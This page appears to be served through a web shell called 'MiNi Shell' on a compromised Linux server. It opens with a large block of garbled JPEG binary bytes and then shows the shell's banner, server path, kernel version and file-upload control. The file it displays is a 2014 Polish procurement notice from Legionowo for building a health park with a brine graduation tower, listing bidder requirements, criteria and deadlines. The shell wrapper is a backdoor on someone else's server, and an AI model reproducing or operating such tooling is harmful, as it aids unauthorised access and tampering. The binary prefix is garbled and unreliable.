JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140626/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140626/137265-N-2014.html

<p class="kh_header"><b>Legionowo: Budowa Parku Zdrowia w Legionowie</b><br>
<b>Numer ogłoszenia: 137265 - 2014; data zamieszczenia: 26.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Legionowo Urząd Miasta Legionowo , ul.  marsz. J. Piłsudskiego 41, 05-120 Legionowo, woj. mazowieckie, tel. 022 774 20 31 w. 4064, faks 022 784 49 81.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.legionowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Parku Zdrowia w Legionowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty budowlane związane z budową zespołu terenowych urządzeń sportowo-rekreacyjnych PARKU ZDROWIA  u zbiegu ulic Jana III Sobieskiego, ul.B.Chrobrego i ul.ks.Piotra Skargi w Legionowie. 
2. Przedmiot zamówienia obejmuje:
1) przygotowanie terenu inwestycji wraz z wycinką drzew i karczowaniem karp na terenie części działki ewidencyjnej numer 50/2 w obrębie ewidencyjnym numer 34 w Legionowie wyłączonej z produkcji leśnej zgodnie z decyzją Nr 144/14 z dnia 07.05.2014r. znak ZW-21241-106/14/AK/1841 wydaną przez Dyrektora Regionalnej Dyrekcji Lasów Państwowych w Warszawie oraz drzew na działce ewidencyjnej numer 72/2 w obrębie ewidencyjnym numer 34 kolidujących z utwardzeniem ulicy ks.Piotra Skargi;
2) wykonanie zabiegów pielęgnacyjnych części działki ewidencyjnej numer 50/2 w obrębie ewidencyjnym numer 34 pozostającej jako teren leśny (prace te WYKONAWCA wykona pod nadzorem leśnika ze Starostwa Powiatowego w Legionowie): zabiegi oczyszczające teren 
z podszytu i podrostów, usunięciu obumarłych drzew i oczyszczenie koron drzew zdrowych 
z wywozem, oczyszczenie i wyrównanie terenu poprzez nawiezienie ziemi, zasianie trawy;
3) zagospodarowanie części terenu działki ewidencyjnej 50/2 w obrębie ewidencyjnym 34 wyłączonej z produkcji leśnej na PARK ZDROWIA poprzez budowę: 
-  ciągów komunikacyjnych; chodników i placów, 
-  miejsc parkingowych od strony ul.B.Chrobrego i od strony ul.ks.Piotra Skargi,
- tężni solankowej z wypełnieniem tarniną i ze szczelnym podziemnym zbiornikiem solanki wraz z instalacją rozprowadzenia, 
- szaletu miejskiego, 
- infrastruktury towarzyszącej: przyłączy i instalacji wodno-kanalizacyjnych, 
- instalacji teletechnicznej - monitoringu PARKU ZDROWIA, 
- oświetlenia terenu w tym podświetlenie wybranych elementów PARKU ZDROWIA i atrakcyjnych drzew, 
wykonanie: 
- obiektów małej architektury: pergol, altan, siłowni plenerowej dla dorosłych, placu piknikowego do gier w karty, szachy i chińczyka, ustawienie: ławek, koszy na śmieci, montaż: źródełka wody pitnej, zegara na słupie, koszy, regulaminów, tablicy informacyjnej (gablota), stojaków rowerowych, ozdobnych słupków w postaci kul oraz kwietników,  zagospodarowanie terenu zielenią:wykonanie nawierzchni trawiastych - z mechaniczną pielęgnacją trawników: pierwsze koszenie - i nasadzeń, 
- utwardzenie jezdni ul.ks.Piotra Skargi z budową chodnika z kostki betonowej, odwodnieniem (drenaż francuski), regulację wysokościową elementów urządzeń obcych sieci, zagospodarowaniem zielenią i wykonaniem stałej organizacji ruchu.              
UWAGA I: 
w cenie wykonania przedmiotu umowy zawarta jest zbilansowana wartość materiałowa pozyskanego drewna z wycinki drzew (według wycen sporządzonych przez Zamawiającego łączna wartość pozyskanego drewna oszacowana została na kwotę - 14.921,44zł brutto), wycinka i zagospodarowanie pozyskanego drewna leży po stronie wykonawcy w ramach wynagrodzenia ryczałtowego, o którym mowa w § 2 - Wykonawca sporządząjąc wycenę całości przedmiotu umowy uwzględnił wartość pozyskanego drewna i o tą wartość pomniejszył swoją ofertę - fakt ten zostanie odnotowany w protokole końcowym odbioru przedmiotu umowy;
wykonawca wystąpi do  Starosty Legionowskiego z wnioskiem o  ocechowanie drewna 
i wydanie świadectwa legalności drewna pozyskanego w wyniku wycinki pod rygorem konsekwencji wynikających z art. 272 kodeksu karnego;.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.20-8, 45.10.00.00-8, 45.11.27.10-5, 45.21.55.00-2, 45.22.31.00-7, 45.23.32.60-9, 45.23.31.20-6, 45.31.00.00-3, 45.23.23.32-8, 45.31.43.20-0, 45.26.25.22-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 75.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wpłaty wadium w kwocie: 40.000,00 zł (słownie: czterdzieści tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) wykonania, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jednej roboty budowlanej obejmującej swoim zakresem budowę lub remont tężni solankowej;
2)  wykonania, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jednej roboty budowlanej obejmującej swoim zakresem wykonanie nawierzchni utwardzonej z kostki brukowej o powierzchni  min. 2.000m2;
3)  wykonania, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jednej roboty budowlanej obejmującej swoim zakresem wykonanie nawierzchni mineralno-żywicznej  
o powierzchni  min. 1.000m2;
4)  wykonania, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jednej roboty budowalnej obejmującej swoim zakresem wykonanie oświetlenia ulicznego lub parkowego 
w ilości minimum 50 punktów oświetleniowych;
5)  wykonania, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jednej roboty budowlanej obejmujących swym zakresem wykonanie kanalizacji sanitarnej o długości minimum 70 mb i średnicy minimum Dz 0,16 m;
6) wykonania, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jednej roboty budowlanej obejmujących swym zakresem wykonanie sieci wodociągowej o długości minimum 150 mb i średnicy zewn. minimum 32 mm;
7) wykonania, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jednej roboty budowlanej obejmującej swoim zakresem wykonanie zagospodarowania terenu  zieleni o pow. min. 1.000 m2 wraz z małą architekturą (altany, pergole, ławki,urządzenia zabawowe);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) dysponowania kierownikiem budowy, który posiada uprawnienia budowlane w specjalności konstrukcyjno-budowlanej uprawniające do kierowania budową;
2) dysponowania kierownikiem budowy, który posiada uprawnienia budowlane w specjalności drogowej uprawniające do kierowania budową;
3) dysponowania kierownikiem robót, który posiada uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci i instalacji kanalizacyjnych i wodociągowych uprawniające do kierowania robotami budowlanymi; 
4) dysponowania kierownikiem robót, który posiada uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci i instalacji elektrycznych uprawniające do kierowania robotami budowlanymi;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania, wykonawcy, o ile ofertę składa pełnomocnik lub przedstawiciel wykonawcy; 2) jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1) tiret 1 zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dopuszcza się zamianę wynagrodzenia brutto w przypadku:
1)  zmiany stawek podatkowych, wprowadzonych stosownymi przepisami prawa powszechnie obowiązującego, wynagrodzenie netto pozostanie bez zmian,
2) powstania i rozliczenia robót zaniechanych oraz robót zamiennych powodujących zmniejszenie wynagrodzenia ryczałtowego.
2. Przedłużenie umownego terminu wykonania umowy może nastąpić tylko w uzasadnionych sytuacjach, w szczególności jeśli spowodowane jest:
a) wystąpieniem dodatkowych i niemożliwych do przewidzenia robót, które warunkują prawidłowe prowadzenie robót podstawowych o wartości większej niż 10 % kwoty łącznego wynagrodzenia określonego w § 2 ust. 1 umowy,
b) wystąpieniem niesprzyjających warunków pogodowych, które uniemożliwiają prowadzenie robót zgodnie ze sztuką budowlaną, 
c) wystąpieniem okoliczności, których nie można było przewidzieć w chwili zawarcia umowy niezależnych od WYKONAWCY i niezawinionych przez WYKONAWCĘ, 
d) działaniem osób trzecich (protestów okolicznych mieszkańców, stowarzyszeń), które to działania uniemożliwią wykonanie lub kontynuacje prac oraz wystąpienia zdarzeń, na które podmioty uczestniczące w realizacji zadania inwestycyjnego nie mają wpływu, 
e) koniecznością usunięcia wad ukrytych dokumentacji projektowej oraz wprowadzenia zmian w stosunku do dokumentacji projektowej o czas potrzebny na dokonanie zmian,
f)  koniecznością pozyskania dodatkowych uzgodnień lub dodatkowych decyzji o czas konieczny na ich pozyskanie,
g) konieczności wprowadzenia zmian do dokumentacji projektowej na skutek wydanych decyzji o czas potrzebny na dokonanie tych zmian,
h) wykonaniem robót zamiennych, nie wykraczających poza zakres przedmiotu zamówienia na uzasadniony wniosek Wykonawcy, Zamawiającego lub Projektanta w sytuacji konieczności:
- zwiększenia bezpieczeństwa realizacji robót budowlanych, usprawnienia procesu budowy i uzyskania założonego efektu użytkowego pod warunkiem, że zmiana ta będzie korzystna dla
Zamawiającego, 
- konieczności zmiany zaprojektowanej technologii wykonania na lepszą, pozwalającą na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji, 
- zaistnienia konieczności zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych (technologicznych) niż wskazanych w dokumentacji, w sytuacji, gdy zastosowanie przewidzianych rozwiązań  groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy po zaakceptowaniu tych zmian przez osoby pełniące nadzór autorski, nadzór inwestorski i ZAMAWIAJĄCEGO oraz pod warunkiem, że zmiany te nie spowodują wzrostu wynagrodzenia ryczałtowego, o którym mowa w  § 2 ust. 1. Wszystkie w/w zmiany są możliwe, jeżeli konieczność ich wprowadzenia będzie wynikała ze stosownego protokołu konieczności. Stosowny aneks do umowy będzie w takiej sytuacji określał roboty zaniechane i roboty zamienne, a także ewentualne zmniejszenie wynagrodzenia ryczałtowego. 
3. ZAMAWIAJĄCY dopuszcza zmianę osób odpowiedzialnych za wykonanie przedmiotu umowy po stronie WYKONAWCY, pod warunkiem, że wystąpią następujące przypadki:
- śmierć, choroba lub inne zdarzenie losowe,
- nie wywiązywanie się osób z obowiązków wynikających z umowy,
- rezygnacja tych osób z wykonywania swoich obowiązków. Zmiana kierownika budowy/robót w trakcie realizacji umowy uwarunkowana jest posiadaniem przez nowego kierownika budowy/robót wymaganych przez ZAMAWIAJĄCEGO uprawnień budowalnych. Zmiana kierownika budowy/robót nie wymaga aneksu do umowy.
4. ZAMAWIAJĄCY dopuszcza zmianę rodzaju zabezpieczenia należytego wykonania umowy, wniesionego w jednej formie na inną formę, na pisemny wniosek WYKONAWCY pod warunkiem, że WYKONAWCA zachowa ciągłość zabezpieczenia i jego odpowiednią wysokość.
5. Dopuszcza się zmianę lub rezygnację z Podwykonawcy w trakcie realizacji umowy w przypadku jeżeli zmiana albo rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust.2b Prawo zamówień publicznych, to w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 Prawo zamówień publicznych, Wykonawca jest obowiązany wykazać ZAMAWIAJĄCEMU, iż proponowany inny Podwykonawca lub WYKONAWCA samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. 
6. Dopuszcza się zmiany Podwykonawców w trakcie realizacji umowy, którzy nie spełniali
warunków udziału w postępowaniu na które zasoby WYKONAWCA się nie powoływał na zasadach  określonych w  art. 22 ust.1 Prawo zamówień publicznych, w zakresie:
a) rezygnacji z Podwykonawcy,
b) zmiany Podwykonawcy,
c) wskazania innego zakresu wykonania zamówienia  przy pomocy podwykonawstwa z zastrzeżeniem, że zmiana ta nie będzie mogła dotyczyć części zamówienia wskazanych przez ZAMAWIAJĄCEGO do osobistego wykonania przez WYKONAWCĘ,
d) wskazania Podwykonawcy w przypadku, gdy oferta WYKONAWCY realizującego roboty budowlane nie zawierała takiego wskazania.
7. Dopuszcza się zmiany dalszych Podwykonawców w zakresie ust.17 pkt a,b i c rezygnacji z
dalszego Podwykonawcy, zmiany dalszego Podwykonawcy, wskazania innego zakresu wykonania zamówienia przy pomocy dalszego Podwykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.legionowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dokumentację przetargową można otrzymać w Urzędzie Miasta Legionowo, ul. marsz. J. Piłsudskiego 41, II piętro, pok. 3.12 lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.07.2014 godzina 11:30, miejsce: Siedziba zamawiającego: Biuro Obsługi Klienta, Urząd Miasta Legionowo, ul. marsz. J. Piłsudskiego 41, 05-120 Legionowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 09.08.2014.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Miejski współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego 
w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego na lata 2007-2013 Inicjatywa JESSICA.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com